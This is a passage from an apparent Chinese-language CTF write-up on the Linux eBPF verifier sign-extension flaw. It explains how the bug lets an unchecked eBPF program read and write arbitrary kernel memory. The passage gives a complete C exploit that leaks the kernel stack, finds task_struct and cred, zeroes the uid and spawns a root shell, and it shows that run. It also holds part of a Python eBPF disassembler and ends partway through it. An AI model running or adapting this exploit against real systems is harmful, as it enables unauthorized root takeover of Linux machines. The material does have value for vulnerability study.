/* case: R1 = R2
* copy register state to dest reg
*/
regs[insn->dst_reg] = regs[insn->src_reg];
} else {
if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d partial copy of pointer\n",
insn->src_reg);
return -EACCES;
}
regs[insn->dst_reg].type = UNKNOWN_VALUE;
regs[insn->dst_reg].map_ptr = NULL;
}
[1] } else {
/* case: R = imm
* remember the value we stored into this reg
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}

} else if (opcode > BPF_END) {
verbose("invalid BPF_ALU opcode %x\n", opcode);
return -EINVAL;

} else { /* all other ALU ops: and, sub, xor, add, ... */
......
}

return 0;
}

而在真实执行的过程中,由于寄存器类型不一样,在执行第二条跳转语句时存在问题:

1
2
3
4
5
6
JMP_JNE_K:
if (DST != IMM) {
insn += insn->off;
CONT_JMP;
}
CONT;

而翻译成汇编就非常明显了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
   0xffffffff81173bad <__bpf_prog_run+1565>    mov    qword ptr [rbp + rax*8 - 0x278], rdi
0xffffffff81173bb5 <__bpf_prog_run+1573> movzx eax, byte ptr [rbx]
0xffffffff81173bb8 <__bpf_prog_run+1576> jmp qword ptr [r12 + rax*8]

0xffffffff81173e7b <__bpf_prog_run+2283> movzx eax, byte ptr [rbx + 1]
0xffffffff81173e7f <__bpf_prog_run+2287> movsxd rdx, dword ptr [rbx + 4]
► 0xffffffff81173e83 <__bpf_prog_run+2291> and eax, 0xf
0xffffffff81173e86 <__bpf_prog_run+2294> cmp qword ptr [rbp + rax*8 - 0x278], rdx
0xffffffff81173e8e <__bpf_prog_run+2302> je __bpf_prog_run+5036 <0xffffffff8117493c>

0xffffffff81173e94 <__bpf_prog_run+2308> movsx rax, word ptr [rbx + 2]
0xffffffff81173e99 <__bpf_prog_run+2313> lea rbx, [rbx + rax*8 + 8]
0xffffffff81173e9e <__bpf_prog_run+2318> movzx eax, byte ptr [rbx]
─────────────────────────────────────[ STACK ]──────────────────────────────────────
00:0000│ rsp 0xffff88000048fa30 ◂— 0xcc
01:0008│ 0xffff88000048fa38 ◂— 0x0
02:0010│ 0xffff88000048fa40 —▸ 0xffff88000fabb500 ◂— 0x0
03:0018│ 0xffff88000048fa48 —▸ 0xffffffff811afebc (zone_statistics+124) ◂— 0xbec35d5d415c415b
04:0020│ 0xffff88000048fa50 ◂— 0x1
05:0028│ 0xffff88000048fa58 —▸ 0xffff88000c46e780 ◂— 0x17c
06:0030│ 0xffff88000048fa60 —▸ 0xffff88000048fc18 —▸ 0xffff88000048fc70 —▸ 0xffff88000a550f00 ◂— 0x200000001
07:0038│ 0xffff88000048fa68 —▸ 0xffff88000048fb30 —▸ 0xffff88000048fc70 —▸ 0xffff88000a550f00 ◂— 0x200000001
───────────────────────────────────[ BACKTRACE ]────────────────────────────────────
► f 0 ffffffff81173e83 __bpf_prog_run+2291
f 1 ffffffff817272bc sk_filter_trim_cap+108
f 2 ffffffff817272bc sk_filter_trim_cap+108
f 3 ffffffff817b824a unix_dgram_sendmsg+586
f 4 ffffffff817b824a unix_dgram_sendmsg+586
f 5 ffffffff816f4728 sock_sendmsg+56
f 6 ffffffff816f4728 sock_sendmsg+56
f 7 ffffffff816f47c5 sock_write_iter+133
f 8 ffffffff8120cf59 __vfs_write+201
f 9 ffffffff8120cf59 __vfs_write+201
f 10 ffffffff8120d5d9 vfs_write+169
pwndbg> i r rdx
rdx 0xffffffffffffffff -1
pwndbg> x /gx $rbx+4
0xffffc90000099034: 0x000000b7ffffffff
pwndbg>

可以看到汇编指令被翻译成movsxd,而此时会发生符号扩展,由原来的0xffffffff扩展成0xffffffffffffffff,再次比较的时候二者并不相同,造成了跳转到[4]处执行,从而绕过了对[4]以后EBPF程序的校验。

漏洞利用

当[4]以后的程序不经过check以后,就可以对[4]的内容进行构造了,利用真正执行时无类型就可以达到内存任意读写了。

利用本人写的小工具对已有的EBPF程序进行解码,可以看到程序逻辑如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
[0]: ALU_MOV_K(0,9,0x0,0xffffffff)
[1]: JMP_JNE_K(0,9,0x2,0xffffffff)
[2]: ALU64_MOV_K(0,0,0x0,0x0)
[3]: JMP_EXIT(0,0,0x0,0x0)
[4]: LD_IMM_DW(1,9,0x0,0x3)
[5]: maybe padding
[6]: ALU64_MOV_X(9,1,0x0,0x0)
[7]: ALU64_MOV_X(10,2,0x0,0x0)
[8]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[9]: ST_MEM_W(0,10,0xfffc,0x0)
[10]: JMP_CALL(0,0,0x0,0x1)
[11]: JMP_JNE_K(0,0,0x1,0x0)
[12]: JMP_EXIT(0,0,0x0,0x0)
[13]: LDX_MEM_DW(0,6,0x0,0x0)
[14]: ALU64_MOV_X(9,1,0x0,0x0)
[15]: ALU64_MOV_X(10,2,0x0,0x0)
[16]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[17]: ST_MEM_W(0,10,0xfffc,0x1)
[18]: JMP_CALL(0,0,0x0,0x1)
[19]: JMP_JNE_K(0,0,0x1,0x0)
[20]: JMP_EXIT(0,0,0x0,0x0)
[21]: LDX_MEM_DW(0,7,0x0,0x0)
[22]: ALU64_MOV_X(9,1,0x0,0x0)
[23]: ALU64_MOV_X(10,2,0x0,0x0)
[24]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[25]: ST_MEM_W(0,10,0xfffc,0x2)
[26]: JMP_CALL(0,0,0x0,0x1)
[27]: JMP_JNE_K(0,0,0x1,0x0)
[28]: JMP_EXIT(0,0,0x0,0x0)
[29]: LDX_MEM_DW(0,8,0x0,0x0)
[30]: ALU64_MOV_X(0,2,0x0,0x0)
[31]: ALU64_MOV_K(0,0,0x0,0x0)
[32]: JMP_JNE_K(0,6,0x3,0x0)
[33]: LDX_MEM_DW(7,3,0x0,0x0)
[34]: STX_MEM_DW(3,2,0x0,0x0)
[35]: JMP_EXIT(0,0,0x0,0x0)
[36]: JMP_JNE_K(0,6,0x2,0x1)
[37]: STX_MEM_DW(10,2,0x0,0x0)
[38]: JMP_EXIT(0,0,0x0,0x0)
[39]: STX_MEM_DW(8,7,0x0,0x0)
[40]: JMP_EXIT(0,0,0x0,0x0)

下面对这个程序进行分析:

首先,[0]~[3]已经分析过了下面对后续指令进行分析:

第[4]~[5]条语句可用由上面的map知识得到,第五条语句是填充语句,当执行完后,会将map的地址存放在r9寄存器中。

[6]~[13]语句的类C代码如下,即调用BPF_FUNC_map_lookup_elem(map_add,idx),并将返回值存到r6寄存器中,即r6=map[0]

1
2
3
4
5
6
7
8
[6]: r1=r9
[7]: r2=rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0 (idx)
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0== 0:
[12]: exit(0)
[13]: r6=[r0]

[14]~[21]同理,将r7=map[1]。[22]~[29]为r8=map[2],而map的内容可以由用户态传入。

最后[30]~[40]分为三个不分,map[0] = 0时,将map[1]地址所指的内容,写到map[3]中,用户态可以通过读map[3]来得到这个值,因此是内存任意读功能。map[0]=1时,将rbp的值写入map[3]中,由此可以泄露内核栈地址。map[0]=2时,将map[3]的值写入map[2]地址中,由此是个内存任意写。

1
2
3
4
5
6
7
8
9
10
11
[30]: ALU64_MOV_X(0,2,0x0,0x0) r2=r0
[31]: ALU64_MOV_K(0,0,0x0,0x0) r0=0
[32]: JMP_JNE_K(0,6,0x3,0x0) if r6!=0 jmpto 36
[33]: LDX_MEM_DW(7,3,0x0,0x0) r3 = [r7]
[34]: STX_MEM_DW(3,2,0x0,0x0) [r2]=r3
[35]: JMP_EXIT(0,0,0x0,0x0) exit(0)
[36]: JMP_JNE_K(0,6,0x2,0x1) if r6!=1 jmpto 39
[37]: STX_MEM_DW(10,2,0x0,0x0) [r2]=rbp
[38]: JMP_EXIT(0,0,0x0,0x0) exit(0)
[39]: STX_MEM_DW(8,7,0x0,0x0) [r7]=r8
[40]: JMP_EXIT(0,0,0x0,0x0) exit(0)

漏洞利用也非常简单,首先利用2功能读取内核栈地址,这样通过栈地址& ~(0x4000 - 1)可以得到内核线程task_struct的地址,而这个数据结构中的cred指针指向该线程的cred数据块,但是这个偏移会随内核编译的改变而改变,从gdb中看这个结构的方法是:

1
2
pwndbg> p &(*(struct task_struct *)0).cred
$2 = (const struct cred **) 0x9b8 <irq_stack_union+2488>

因此,利用0功能可以读出cred的地址,同理找出cred中的uid偏移

1
2
pwndbg> p &(*(struct cred *)0).uid
$3 = (kuid_t *) 0x4 <irq_stack_union+4>

再利用2功能向该地址里写入0,就可以成功提权了。

1
2
3
4
5
6
7
8
9
10
11
12
/ $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/ $ ./upstream44
mapfd finished
bpf_prog_load finished
socketpair finished
setsockopt finished
task_struct = ffff880006d90000
uidptr = ffff8800004313c4
spawning root shell
uid=0(root) gid=0(root) euid=1000(chal) egid=1000(chal) groups=1000(chal)
/ $

相关代码

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9b8 //0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328 //-32

int sockets[2];
int mapfd, progfd;

char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"
"\x55\x09\x02\x00\xff\xff\xff\xff"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x01\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x07\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x02\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x08\x00\x00\x00\x00\x00\x00"
"\xbf\x02\x00\x00\x00\x00\x00\x00"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x03\x00\x00\x00\x00\x00"
"\x79\x73\x00\x00\x00\x00\x00\x00"
"\x7b\x32\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x02\x00\x01\x00\x00\x00"
"\x7b\xa2\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x7b\x87\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version) {
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (__u64)insns,
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = (__u64)license,
.log_buf = (__u64)bpf_log_buf,
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};

attr.kern_version = kern_version;

bpf_log_buf[0] = 0;

return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
int max_entries) {
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};

return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)&key,
.value = (__u64)&value,
.flags = 0,
};

return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (__u64)key,
.value = (__u64)value,
};

return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
fprintf(stderr, "error: %s\n", err);
exit(-1);
}

static void prep(void) {
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0)
__exit(strerror(errno));
puts("mapfd finished");
progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

if (progfd < 0)
__exit(strerror(errno));
puts("bpf_prog_load finished");
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
__exit(strerror(errno));
puts("socketpair finished");
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
__exit(strerror(errno));
puts("setsockopt finished");
}

static void writemsg(void) {
char buffer[64];

ssize_t n = write(sockets[0], buffer, sizeof(buffer));

if (n < 0) {
perror("write");
return;
}
if (n != sizeof(buffer))
fprintf(stderr, "short write: %lu\n", n);
}

#define __update_elem(a, b, c) \
bpf_update_elem(0, (a)); \
bpf_update_elem(1, (b)); \
bpf_update_elem(2, (c)); \
writemsg();

static uint64_t get_value(int key) {
uint64_t value;

if (bpf_lookup_elem(&key, &value))
__exit(strerror(errno));

return value;
}

static uint64_t __get_fp(void) {
__update_elem(1, 0, 0);

return get_value(2);
}

static uint64_t __read(uint64_t addr) {
__update_elem(0, addr, 0);

return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
__update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
return addr & ~(0x4000 - 1);
}

static void pwn(void) {
uint64_t fp, sp, task_struct, credptr, uidptr;

fp = __get_fp();
if (fp < PHYS_OFFSET)
__exit("bogus fp");

sp = get_sp(fp);
if (sp < PHYS_OFFSET)
__exit("bogus sp");

task_struct = __read(sp);

if (task_struct < PHYS_OFFSET)
__exit("bogus task ptr");

printf("task_struct = %lx\n", task_struct);

credptr = __read(task_struct + CRED_OFFSET); // cred

if (credptr < PHYS_OFFSET)
__exit("bogus cred ptr");

uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET)
__exit("bogus uid ptr");

printf("uidptr = %lx\n", uidptr);
__write(uidptr, 0); // set both uid and gid to 0

if (getuid() == 0) {
printf("spawning root shell\n");
system("id");
system("/bin/sh");
exit(0);
}

__exit("not vulnerable?");
}

int main(int argc, char **argv) {
prep();
pwn();

return 0;
}

ebpf_tool

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
import sys
opcode = []
for i in range(256):
opcode.append('invalid opcode')
code = '''
"\xb4\x09\x00\x00\xff\xff\xff\xff"
"\x55\x09\x02\x00\xff\xff\xff\xff"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x01\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x07\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x02\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x08\x00\x00\x00\x00\x00\x00"
"\xbf\x02\x00\x00\x00\x00\x00\x00"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x03\x00\x00\x00\x00\x00"
"\x79\x73\x00\x00\x00\x00\x00\x00"
"\x7b\x32\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x02\x00\x01\x00\x00\x00"
"\x7b\xa2\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x7b\x87\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"

'''

rules='''
ALU_MOV_K(0,9,0x0,0xffffffff)
JMP_JNE_K(0,9,0x2,0xffffffff)
ALU64_MOV_K(0,0,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
LD_IMM_DW(1,9,0x0,0x3)
padding
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x0)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,6,0x0,0x0)
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x1)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,7,0x0,0x0)
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x2)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,8,0x0,0x0)
ALU64_MOV_X(0,2,0x0,0x0)
ALU64_MOV_K(0,0,0x0,0x0)
JMP_JNE_K(0,6,0x3,0x0)
LDX_MEM_DW(7,3,0x0,0x0)
STX_MEM_DW(3,2,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
JMP_JNE_K(0,6,0x2,0x1)
STX_MEM_DW(10,2,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
STX_MEM_DW(8,7,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
'''

BPF_LD = 0x00
BPF_LDX = 0x01
BPF_ST = 0x02
BPF_STX = 0x03
BPF_ALU = 0x04
BPF_JMP = 0x05
BPF_RET = 0x06
BPF_MISC= 0x07
BPF_W = 0x00
BPF_H = 0x08
BPF_B = 0x10

BPF_IMM = 0x00
BPF_ABS = 0x20
BPF_IND = 0x40
BPF_MEM = 0x60
BPF_LEN = 0x80
BPF_MSH = 0xa0

BPF_ADD = 0x00
BPF_SUB = 0x10
BPF_MUL = 0x20
BPF_DIV = 0x30
BPF_OR = 0x40
BPF_AND = 0x50
BPF_LSH = 0x60
BPF_RSH = 0x70
BPF_NEG = 0x80
BPF_MOD = 0x90
BPF_XOR = 0xa0

BPF_JA = 0x00
BPF_JEQ = 0x10
BPF_JGT = 0x20
BPF_JGE = 0x30
BPF_JSET= 0x40
BPF_K = 0x00
BPF_X = 0x08

BPF_ALU64 =0x07 #/* alu mode in double word width */
BPF_DW =0x18 #/* double word */
BPF_XADD =0xc0 #/* exclusive add */
BPF_MOV =0xb0 #/* mov reg to reg */
BPF_ARSH =0xc0 #/* sign extending arithmetic shift right */
BPF_END =0xd0 #/* flags for endianness conversion: */
BPF_TO_LE =0x00 #/* convert to little-endian */
BPF_TO_BE =0x08 #/* convert to big-endian */
BPF_JNE =0x50 #/* jump != */
BPF_JSGT =0x60 #/* SGT is signed '>', GT in x86 */
BPF_JSGE =0x70 #/* SGE is signed '>=', GE in x86 */
BPF_CALL =0x80 #/* function call */
BPF_EXIT =0x90 #/* function return */

opcode[BPF_ALU | BPF_ADD | BPF_X] = "ALU_ADD_X"
opcode[BPF_ALU | BPF_ADD | BPF_K] = "ALU_ADD_K"
opcode[BPF_ALU | BPF_SUB | BPF_X] = "ALU_SUB_X"
opcode[BPF_ALU | BPF_SUB | BPF_K] = "ALU_SUB_K"
opcode[BPF_ALU | BPF_AND | BPF_X] = "ALU_AND_X"
opcode[BPF_ALU | BPF_AND | BPF_K] = "ALU_AND_K"
opcode[BPF_ALU | BPF_OR | BPF_X] = "ALU_OR_X"
opcode[BPF_ALU | BPF_OR | BPF_K] = "ALU_OR_K"
opcode[BPF_ALU | BPF_LSH | BPF_X] = "ALU_LSH_X"
opcode[BPF_ALU | BPF_LSH | BPF_K] = "ALU_LSH_K"
opcode[BPF_ALU | BPF_RSH | BPF_X] = "ALU_RSH_X"
opcode[BPF_ALU | BPF_RSH | BPF_K] = "ALU_RSH_K"
opcode[BPF_ALU | BPF_XOR | BPF_X] = "ALU_XOR_X"
opcode[BPF_ALU | BPF_XOR | BPF_K] = "ALU_XOR_K"
opcode[BPF_ALU | BPF_MUL | BPF_X] = "ALU_MUL_X"
opcode[BPF_ALU | BPF_MUL | BPF_K] = "ALU_MUL_K"
opcode[BPF_ALU | BPF_MOV | BPF_X] = "ALU_MOV_X"
opcode[BPF_ALU | BPF_MOV | BPF_K] = "ALU_MOV_K"
opcode[BPF_ALU | BPF_DIV | BPF_X] = "ALU_DIV_X"
opcode[BPF_ALU | BPF_DIV | BPF_K] = "ALU_DIV_K"
opcode[BPF_ALU | BPF_MOD | BPF_X] = "ALU_MOD_X"
opcode[BPF_ALU | BPF_MOD | BPF_K] = "ALU_MOD_K"
opcode[BPF_ALU | BPF_NEG] = "ALU_NEG"
opcode[BPF_ALU | BPF_END | BPF_TO_BE] = "ALU_END_TO_BE"
opcode[BPF_ALU | BPF_END | BPF_TO_LE] = "ALU_END_TO_LE"
#/* 64 bit ALU operations */
opcode[BPF_ALU64 | BPF_ADD | BPF_X] = "ALU64_ADD_X"
opcode[BPF_ALU64 | BPF_ADD | BPF_K] = "ALU64_ADD_K"
opcode[BPF_ALU64 | BPF_SUB | BPF_X] = "ALU64_SUB_X"
opcode[BPF_ALU64 | BPF_SUB | BPF_K] = "ALU64_SUB_K"
opcode[BPF_ALU64 | BPF_AND | BPF_X] = "ALU64_AND_X"
opcode[BPF_ALU64 | BPF_AND | BPF_K] = "ALU64_AND_K"
opcode[BPF_ALU64 | BPF_OR | BPF_X] = "ALU64_OR_X"
opcode[BPF_ALU64 | BPF_OR | BPF_K] = "ALU64_OR_K"
opcode[BPF_ALU64 | BPF_LSH | BPF_X] = "ALU64_LSH_X"
opcode[BPF_ALU64 | BPF_LSH | BPF_K] = "ALU64_LSH_K"
opcode[BPF_ALU64 | BPF_RSH | BPF_X] = "ALU64_RSH_X"
opcode[BPF_ALU64 | BPF_RSH | BPF_K] = "ALU64_RSH_K"
opcode[BPF_ALU64 | BPF_XOR | BPF_X] = "ALU64_XOR_X"
opcode[BPF_ALU64 | BPF_XOR | BPF_K] = "ALU64_XOR_K"
opcode[BPF_ALU64 | BPF_MUL | BPF_X] = "ALU64_MUL_X"
opcode[BPF_ALU64 | BPF_MUL | BPF_K] = "ALU64_MUL_K"
opcode[BPF_ALU64 | BPF_MOV | BPF_X] = "ALU64_MOV_X"
opcode[BPF_ALU64 | BPF_MOV | BPF_K] = "ALU64_MOV_K"
opcode[BPF_ALU64 | BPF_ARSH | BPF_X] = "ALU64_ARSH_X"
opcode[BPF_ALU64 | BPF_ARSH | BPF_K] = "ALU64_ARSH_K"
opcode[BPF_ALU64 | BPF_DIV | BPF_X] = "ALU64_DIV_X"
opcode[BPF_ALU64 | BPF_DIV | BPF_K] = "ALU64_DIV_K"
opcode[BPF_ALU64 | BPF_MOD | BPF_X] = "ALU64_MOD_X"
opcode[BPF_ALU64 | BPF_MOD | BPF_K] = "ALU64_MOD_K"
opcode[BPF_ALU64 | BPF_NEG] = "ALU64_NEG"
#/* Call instruction */
opcode[BPF_JMP | BPF_CALL] = "JMP_CALL"
opcode[BPF_JMP | BPF_CALL | BPF_X] = "JMP_TAIL_CALL"
#/* Jumps */
opcode[BPF_JMP | BPF_JA] = "JMP_JA"
opcode[BPF_JMP | BPF_JEQ | BPF_X] = "JMP_JEQ_X"
opcode[BPF_JMP | BPF_JEQ | BPF_K] = "JMP_JEQ_K"
opcode[BPF_JMP | BPF_JNE | BPF_X] = "JMP_JNE_X"
opcode[BPF_JMP | BPF_JNE | BPF_K] = "JMP_JNE_K"
opcode[BPF_JMP | BPF_JGT | BPF_X] = "JMP_JGT_X"
opcode[BPF_JMP | BPF_JGT | BPF_K] = "JMP_JGT_K"
opcode[BPF_JMP | BPF_JGE | BPF_X] = "JMP_JGE_X"
opcode[BPF_JMP | BPF_JGE | BPF_K] = "JMP_JGE_K"
opcode[BPF_JMP | BPF_JSGT | BPF_X] = "JMP_JSGT_X"
opcode[BPF_JMP | BPF_JSGT | BPF_K] = "JMP_JSGT_K"
opcode[BPF_JMP | BPF_JSGE | BPF_X] = "JMP_JSGE_X"
opcode[BPF_JMP | BPF_JSGE | BPF_K] = "JMP_JSGE_K"
opcode[BPF_JMP | BPF_JSET | BPF_X] = "JMP_JSET_X"
opcode[BPF_JMP | BPF_JSET | BPF_K] = "JMP_JSET_K"
#/* Program return */
opcode[BPF_JMP | BPF_EXIT] = "JMP_EXIT"
#/* Store instructions */
opcode[BPF_STX | BPF_MEM | BPF_B] = "STX_MEM_B"
opcode[BPF_STX | BPF_MEM | BPF_H] = "STX_MEM_H"
opcode[BPF_STX | BPF_MEM | BPF_W] = "STX_MEM_W"
opcode[BPF_STX | BPF_MEM | BPF_DW] = "STX_MEM_DW"
opcode[BPF_STX | BPF_XADD | BPF_W] = "STX_XADD_W"
